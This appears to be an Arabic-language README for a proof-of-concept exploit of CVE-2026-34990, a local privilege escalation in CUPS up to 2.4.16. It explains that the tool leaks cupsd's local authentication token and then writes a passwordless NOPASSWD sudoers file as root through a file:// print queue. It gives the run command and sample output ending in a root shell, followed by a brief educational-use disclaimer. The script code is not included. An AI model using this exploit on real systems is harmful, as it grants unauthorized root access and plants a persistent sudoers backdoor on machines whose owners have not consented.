
حالة إثبات مفهوم دنيا لـ CVE-2026-34990: تصعيد صلاحيات محلي في CUPS <= 2.4.16 يؤدي إلى تسريب رمز مصادقة Local الخاص بـ cupsd وكتابة جزء sudoers من نوع NOPASSWD بصلاحيات الجذر.
تصعيد صلاحيات محلي ضد CUPS <= 2.4.16 الذي يعمل بصلاحيات root. يسرّب رمز المصادقة المحلي الخاص بـ cupsd، ثم يكتب جزء sudoers بدون كلمة مرور (NOPASSWD) بصلاحيات root عبر طابور طباعة file://.
python3 poc.py
عند النجاح:
[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i
ثم:
sudo -i
هذا السكربت مخصص للأغراض التعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال. تأكد دائمًا من حصولك على إذن قبل اختبار أو استغلال الثغرات!